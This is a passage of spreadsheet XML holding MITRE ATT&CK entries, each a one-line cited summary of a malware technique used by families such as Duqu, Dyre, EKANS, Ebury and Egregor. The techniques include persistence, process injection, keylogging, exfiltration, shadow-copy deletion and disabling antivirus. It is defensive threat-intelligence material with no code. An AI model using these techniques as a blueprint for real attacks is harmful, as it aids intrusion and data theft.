    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on accounts and permissions.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--2db406cf-667d-4ad6-b768-7645f6663ac9</t>
  </si>
  <si>
    <t>relationship--611cb6eb-efdb-4d74-b354-5064ab52bd34</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</si>
  <si>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</si>
  <si>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relationship--16ad2735-61b3-4cb4-8f23-439df70715c8</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on process details.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--3b0a7f6a-173f-41e6-8dec-2d1b4a0851d9</t>
  </si>
  <si>
    <t>[Duqu](https://attack.mitre.org/software/S0038) is capable of loading executable code via process hollowing.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--f64acb43-91b8-431a-ad0a-ad22afe5851a</t>
  </si>
  <si>
    <t>relationship--48f74ebb-3a7e-4b65-8e87-04d3bfe02914</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</si>
  <si>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</si>
  <si>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relationship--8d7cd505-3b0e-4e90-bf47-6552612958dc</t>
  </si>
  <si>
    <t>relationship--bdee01a7-16cb-417e-8d9b-c98afd445bbc</t>
  </si>
  <si>
    <t>When the [Duqu](https://attack.mitre.org/software/S0038) command and control is operating over HTTP or HTTPS, Duqu uploads data to its controller by appending it to a blank JPG file.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--c0905059-1f3c-414c-8027-b8ec2e4b3c89</t>
  </si>
  <si>
    <t>The [Duqu](https://attack.mitre.org/software/S0038) command and control protocol's data stream can be encrypted with AES-CBC.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--7cb48d6d-1171-4e9d-87c7-4779293f6921</t>
  </si>
  <si>
    <t>The reconnaissance modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network configuration.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--dbf13cc5-f61b-41fd-96fa-d0bac20549bc</t>
  </si>
  <si>
    <t>The discovery modules used with [Duqu](https://attack.mitre.org/software/S0038) can collect information on network connections.(Citation: Symantec W32.Duqu)</t>
  </si>
  <si>
    <t>relationship--938a71e3-a9dc-4ad9-b1c4-b15d75967b8d</t>
  </si>
  <si>
    <t>relationship--448a35fc-fecf-4373-9888-30c37dd1d56a</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</si>
  <si>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</si>
  <si>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relationship--46660a8a-7724-4577-b09e-551a1ce61bfc</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can compress files via RAR while staging data to be exfiltrated.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--51300de6-0f80-45dc-92f7-f48dbc887d8c</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has exfiltrated data to the C2 server.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--5434447a-d954-4106-9657-ee62a4acf27b</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has two hard-coded domains for C2 servers; if the first does not respond, it will try the second.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--b2ab26e2-eb90-4f19-b35a-b8a0a5438961</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can delete files it creates from the infected system.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--339e60fc-f94c-4b51-bc78-846c29c4340d</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</si>
  <si>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</si>
  <si>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relationship--f9773935-853e-4d5e-9345-9587fd77340d</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) contains a keylogger.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--5e2e672a-02d4-4510-a629-942d44a558f1</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for network drives and removable media and duplicates itself onto them.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--ad5f49b0-8b92-43d1-99f3-c691ccb7a8ac</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) created folders in temp directories to host collected files before exfiltration.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--7e7c0aa8-a17e-4079-b1fd-188977cf1a6e</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses a function to obfuscate the name of functions and other parts of the malware.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--40772ec1-2f25-425f-aad5-635f64ba8fd2</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) can detect connected USB devices.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--62a7f7c2-435d-4ef6-aee3-add933fb241d</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) collects information about running processes from victims.(Citation: DustySky)(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--f33725f4-cce5-4868-b494-d73419c76bdf</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) achieves persistence by creating a Registry entry in &lt;code&gt;HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--9a7ff784-436b-40c5-bfb0-25e02e1d9940</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) searches for removable media and duplicates itself onto it.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--3eb29574-145d-4d4a-b4c6-e94b8a79781e</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) captures PNG screenshots of the main screen.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--a724a449-cd4d-419a-90a0-cdd5927c60b7</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) checks for the existence of anti-virus.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--ad50f322-18b6-43c7-bf6b-f77f4932fdad</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) lists all installed software for the infected machine.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>relationship--2b89f806-5b78-4599-9536-13b47c35d26d</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) extracts basic information about the operating system.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--c008b7f3-0507-4987-a7e4-8c4d57cb4ca5</t>
  </si>
  <si>
    <t>[DustySky](https://attack.mitre.org/software/S0062) has used both HTTP and HTTPS for C2.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--2892eada-7633-4428-80e0-0e965d5faf5c</t>
  </si>
  <si>
    <t>The [DustySky](https://attack.mitre.org/software/S0062) dropper uses Windows Management Instrumentation to extract information about the operating system and whether an anti-virus is active.(Citation: DustySky)</t>
  </si>
  <si>
    <t>relationship--6a58662b-4eb1-4172-b387-13e9b574368a</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) decrypts resources needed for targeting the victim.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--6d1074cb-a9eb-4237-b8b2-d823cfa1408b</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) injects into other processes to load modules.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>relationship--508879cf-53b7-4578-9a5f-9ed20dfb09ef</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to send information staged on a compromised host externally to C2.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--ed543016-8c64-42dd-89e1-7c6a49791d80</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has a command to download and executes additional files.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>relationship--47cd42b3-1a19-415f-8522-a601268d8017</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to create files in a TEMP folder to act as a database to store information.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--2d82c7df-baa0-4268-855d-03df92fa35ab</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to directly inject its code into the web browser process.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--d9c19c4a-a2e3-41f9-b508-d0d008c08993</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to achieve persistence by adding a new task in the task scheduler to run every minute.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--57828888-a833-44c7-af2c-e250d799a9bc</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify installed programs on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--e4489924-d87d-4a18-8702-418361f6a2bb</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has been delivered with encrypted resources and must be unpacked for execution.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--c6467df1-e2fd-4fff-b647-606be50a9078</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) can detect sandbox analysis environments by inspecting the process list and Registry.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--17f9d6c8-f938-4532-b834-3834655911b8</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the computer name, OS version, and hardware configuration on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--c1a4334d-8975-4ca2-8734-d6c26e36702a</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify network settings on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--03732f50-c46c-49f1-bd47-cc56bb96cf23</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify the users on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--143dbc8a-0b00-4510-aacf-96437d87ea2b</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) has the ability to identify running services on a compromised host.(Citation: Malwarebytes Dyreza November 2015)</t>
  </si>
  <si>
    <t>relationship--f79947b2-49bc-4658-b93c-3aa9dbf9cd5e</t>
  </si>
  <si>
    <t xml:space="preserve">[Dyre](https://attack.mitre.org/software/S0024) uses HTTPS for C2 communications.(Citation: Symantec Dyre June 2015)(Citation: Malwarebytes Dyreza November 2015)	 </t>
  </si>
  <si>
    <t>relationship--812073c3-43c5-4f92-b396-56b669eee0ad</t>
  </si>
  <si>
    <t>[Dyre](https://attack.mitre.org/software/S0024) registers itself as a service by adding several Registry keys.(Citation: Symantec Dyre June 2015)</t>
  </si>
  <si>
    <t>relationship--e9d2213a-81cf-45e3-876f-825d4ff2afae</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can delete log files generated from the malware stored at &lt;code&gt;C:\windows\temp\tmp0207&lt;/code&gt;.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>relationship--05f303b4-7582-45d1-af25-46250afc4d8f</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture and store keystrokes.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>relationship--bc215902-f577-4968-8447-b4a22432b1c2</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has stored keystrokes and screenshots within the &lt;code&gt;%temp%\GoogleChrome&lt;/code&gt;, &lt;code&gt;%temp%\Downloads&lt;/code&gt;, and &lt;code&gt;%temp%\TrendMicroUpdate&lt;/code&gt; directories.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>relationship--f8c1f1e4-4580-4ec6-9bc0-6f24214dc273</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) has encrypted strings with RC4.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>relationship--1ffbf752-ed3a-47bb-8351-92ed7118dc5d</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can capture screenshots and store them locally.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>relationship--8852f9e4-c2f1-4d24-8bc6-8539ec4180a5</t>
  </si>
  <si>
    <t>[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) can use [cmd](https://attack.mitre.org/software/S0106) to execute commands on a victim’s machine.(Citation: CISA EB Aug 2020)</t>
  </si>
  <si>
    <t>relationship--6c4fc721-fe3b-4e0c-8fe6-2c8c07ac0df5</t>
  </si>
  <si>
    <t>S0605</t>
  </si>
  <si>
    <t>EKANS</t>
  </si>
  <si>
    <t>malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) uses standard encryption library functions to encrypt files.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>relationship--36106fcd-5f7f-47b9-8a45-1faa89d2ba36</t>
  </si>
  <si>
    <t>12 February 2021</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) stops processes related to security and management software.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)</t>
  </si>
  <si>
    <t>relationship--aa14aefc-cb6c-4230-9f45-00e77faff0c1</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) removes backups of Volume Shadow Copies to disable any restoration capabilities.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>relationship--4238bdb9-71ad-413f-a2fa-4c090ed4c469</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) has been disguised as &lt;code&gt;update.exe&lt;/code&gt; to appear as a valid executable.(Citation: Dragos EKANS)</t>
  </si>
  <si>
    <t>relationship--f863b935-fd1e-4604-be94-a7ae150b8d53</t>
  </si>
  <si>
    <t xml:space="preserve">[EKANS](https://attack.mitre.org/software/S0605) uses encoded strings in its process kill list.(Citation: FireEye Ransomware Feb 2020) </t>
  </si>
  <si>
    <t>relationship--c17229de-8778-4dd9-adb9-7b9c6bb2b99b</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) looks for processes from a hard-coded list.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)(Citation: IBM Ransomware Trends September 2020)</t>
  </si>
  <si>
    <t>relationship--2c1758b2-6809-48f5-84f1-e82afa950a9f</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) stops database, data backup solution, antivirus, and ICS-related processes.(Citation: Dragos EKANS)(Citation: FireEye Ransomware Feb 2020)(Citation: Palo Alto Unit 42 EKANS)</t>
  </si>
  <si>
    <t>relationship--a3a89546-f4fe-47f6-9109-89f6fa5af151</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) can determine the domain of a compromised host.(Citation: IBM Ransomware Trends September 2020)</t>
  </si>
  <si>
    <t>relationship--7869fea0-23fe-4a05-bb16-b33019b9e2c1</t>
  </si>
  <si>
    <t>[EKANS](https://attack.mitre.org/software/S0605) can use Windows Mangement Instrumentation (WMI) calls to execute operations.(Citation: Dragos EKANS)</t>
  </si>
  <si>
    <t>relationship--6ade9df2-d75a-40a6-91aa-f3150e07ac6a</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing directory listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>relationship--10619fa8-c479-4b61-9aac-ee08f00114d1</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) is capable of performing process listings.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>relationship--771c349e-1b23-41ea-bcab-59bdbd6c935f</t>
  </si>
  <si>
    <t>[ELMER](https://attack.mitre.org/software/S0064) uses HTTP for command and control.(Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>relationship--76e75bfe-b72c-471b-9a26-eab5ed04a812</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can upload files over the C2 channel from the infected host.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>relationship--8167df91-ca5b-4a65-b94e-a40e6d54ad40</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has a function called "DeleteLeftovers" to remove certain artifacts of the attack.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--2062ec61-e6b5-45dd-8d2d-71aa5aa1f6e8</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can download and upload files to the victim's computer.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--b3b6e98e-8d0f-4262-ae61-26c171bf20c6</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can make modifications to the Regsitry for persistence.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--a7c6693e-d1e2-4396-982f-85978c9b97a3</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used a one-way communication method via GitLab and Digital Point to perform C2.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--184f018e-cb09-4da4-a599-bc7de09e262e</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can achieve persistence through the Registry Run key.(Citation: ESET EvilNum July 2020)(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--1ec23e24-e63e-4c35-ad0d-637880ce7bb6</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can run a remote scriptlet that drops a file and executes it via regsvr32.exe.(Citation: ESET EvilNum July 2020) </t>
  </si>
  <si>
    <t>relationship--dfed3236-eb97-4a56-9325-1fb3d1c12ba4</t>
  </si>
  <si>
    <t xml:space="preserve">[EVILNUM](https://attack.mitre.org/software/S0568) can execute commands and scripts through rundll32.(Citation: Prevailion EvilNum May 2020) </t>
  </si>
  <si>
    <t>relationship--c18efb6c-f31d-43b8-8ddb-5d6ffce64018</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can search for anti-virus products on the system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--ce853f8b-4aab-4404-a8d0-d9d024f1eda6</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can harvest cookies and upload them to the C2 server.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--8785b9f9-52dd-4bf5-8e88-b80c4c28dc7f</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the computer name from the victim's system.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--3ff46c64-10c7-474c-86eb-c66f1f85f5ac</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) can obtain the username from the victim's machine.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--b92d20d6-f6c3-4e5d-9f05-a06d45603617</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has changed the creation date of files.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--8f8618b7-f197-4869-bb35-3ca58d171be0</t>
  </si>
  <si>
    <t>[EVILNUM](https://attack.mitre.org/software/S0568) has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.(Citation: Prevailion EvilNum May 2020)</t>
  </si>
  <si>
    <t>relationship--ed656cf9-64ea-411b-82b8-5260c2694cfd</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can automatically exfiltrate gathered SSH credentials.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>relationship--6ff6558d-3efb-4219-8d47-ecf82755ccf1</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has installed a self-signed RPM package mimicking the original system package on RPM based systems.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>relationship--dddaffe1-4d47-4ffd-93e4-3827dc9abb50</t>
  </si>
  <si>
    <t>26 April 2019</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has been embedded into modified OpenSSH binaries to gain persistent access to SSH credential information.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>relationship--8d90820b-fd91-4452-aa91-50b783c2da38</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has used DNS requests over UDP port 53 for C2.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t>relationship--1b27a43c-3508-4f21-9f39-c05b2be84cb6</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has verified C2 domain ownership by decrypting the TXT record using an embedded RSA public key.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--4800e509-0653-4895-a9f0-e0b538592875</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can disable SELinux Role-Based Access Control and deactivate PAM modules.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--352190f6-e0e6-44c9-9fd2-74179ce6eb57</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used a DGA to generate a domain name for C2.(Citation: ESET Ebury Feb 2014)(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--fc0433bf-560f-4b5f-879c-f87581d7f504</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has injected its dynamic library into descendent processes of sshd via LD_PRELOAD.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--d3102278-dab8-485c-9cd2-52f80c4da8bd</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can exfiltrate SSH credentials through custom DNS queries.(Citation: ESET Windigo Mar 2014)</t>
  </si>
  <si>
    <t>relationship--e6ce13c0-7a23-4974-bacc-187eedd9c6da</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has implemented a fallback mechanism to begin using a DGA when the attacker hasn't connected to the infected system for three days.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--36849ab3-088c-47a5-bcf9-3e68902a2e60</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) can list directory entries.(Citation: ESET Ebury Oct 2017) </t>
  </si>
  <si>
    <t>relationship--0768a69c-4bd8-4d2c-8c31-b25547bd31e3</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) can hook logging functions so that nothing from the backdoor gets sent to the logging facility.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t>relationship--a74a0a14-9c50-48b8-aa6d-5b0aea81e8fb</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can intercept private keys using a trojanized &lt;code&gt;ssh-add&lt;/code&gt; function.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>relationship--5b5a618e-3a67-4223-a158-af4ce7e0c7d9</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has obfuscated its strings with a simple XOR encryption with a static key.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>relationship--9af6241d-355a-4673-b772-8384a718ed64</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) can deactivate PAM modules to tamper with the sshd configuration.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--0b7d2693-022f-41be-a8b7-0f433e3ec48d</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has intercepted unencrypted private keys as well as private key pass-phrases.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t>relationship--e2772353-e6f8-406e-8416-fa4edeecd218</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has used Python to implement its DGA.(Citation: ESET Ebury Oct 2017)	</t>
  </si>
  <si>
    <t>relationship--c1806927-2279-4597-ada9-e0c06b65b7eb</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has used user mode rootkit techniques to remain hidden on the system.(Citation: ESET Ebury Oct 2017)</t>
  </si>
  <si>
    <t>relationship--05a3d203-4b38-4f38-a015-dcfe3bdf9c07</t>
  </si>
  <si>
    <t xml:space="preserve">[Ebury](https://attack.mitre.org/software/S0377) has encoded C2 traffic in hexadecimal format.(Citation: ESET Ebury Feb 2014)	</t>
  </si>
  <si>
    <t>relationship--c128b821-b39b-481a-91a1-a2bad7d6dda2</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.(Citation: ESET Ebury Feb 2014)</t>
  </si>
  <si>
    <t>relationship--77bcb339-4a2f-4fa6-9145-c653000952dc</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) has used a valid, legitimate digital signature to evade detection.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--c7e92a33-f627-44bd-80be-d6e0cfcef656</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) can abuse the legitimate application policytool.exe to load a malicious DLL.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--d186a22f-f42e-43f4-b161-36f2d1714f04</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) has the ability to decrypt fileless loader modules.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--f8e31b9d-941d-4f58-ae3a-3bdbf4b2a923</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) can download additional payloads to a compromised host.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--eda15dd3-2e7d-470c-8b1d-227c7d877e67</t>
  </si>
  <si>
    <t>[Ecipekac](https://attack.mitre.org/software/S0624) can use XOR, AES, and DES to encrypt loader shellcode.(Citation: Securelist APT10 March 2021)</t>
  </si>
  <si>
    <t>relationship--6c75071d-6997-4d41-88fa-bcd8d7b4cb76</t>
  </si>
  <si>
    <t>S0554</t>
  </si>
  <si>
    <t>Egregor</t>
  </si>
  <si>
    <t>malware--cc4c1287-9c86-4447-810c-744f3880ec37</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has used BITSadmin to download and execute malicious DLLs.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--35e66e21-edaf-46ed-8cec-32ba4ce92aa4</t>
  </si>
  <si>
    <t>07 January 2021</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has used DLL side-loading to execute its payload.(Citation: Cyble Egregor Oct 2020) </t>
  </si>
  <si>
    <t>relationship--9eaf89d5-01aa-4758-a2a9-abac83d2a17e</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>relationship--a3eb4cec-8053-4830-b256-e46748dba3d9</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) can collect any files found in the enumerated drivers before sending it to its C2 channel.(Citation: NHS Digital Egregor Nov 2020) </t>
  </si>
  <si>
    <t>relationship--59c58c73-046c-4e01-9ced-8c049381fcd2</t>
  </si>
  <si>
    <t xml:space="preserve">[Egregor](https://attack.mitre.org/software/S0554) has been decrypted before execution.(Citation: NHS Digital Egregor Nov 2020)(Citation: Cybereason Egregor Nov 2020) </t>
  </si>
  <si>
    <t>relationship--66044dfc-ab9a-4de4-a20b-cfed6d3f6236</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) has disabled Windows Defender to evade protections.(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--b319dd46-3f98-421f-9312-1cd92df3ca02</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can conduct Active Directory reconnaissance using tools such as Sharphound or [AdFind](https://attack.mitre.org/software/S0552).(Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
    <t>relationship--afeb1494-e640-410c-8e81-62970e22f8a7</t>
  </si>
  <si>
    <t>22 March 2021</t>
  </si>
  <si>
    <t>[Egregor](https://attack.mitre.org/software/S0554) can modify the GPO to evade detection.(Citation: Cybereason Egregor Nov 2020) (Citation: Intrinsec Egregor Nov 2020)</t>
  </si>
  <si>
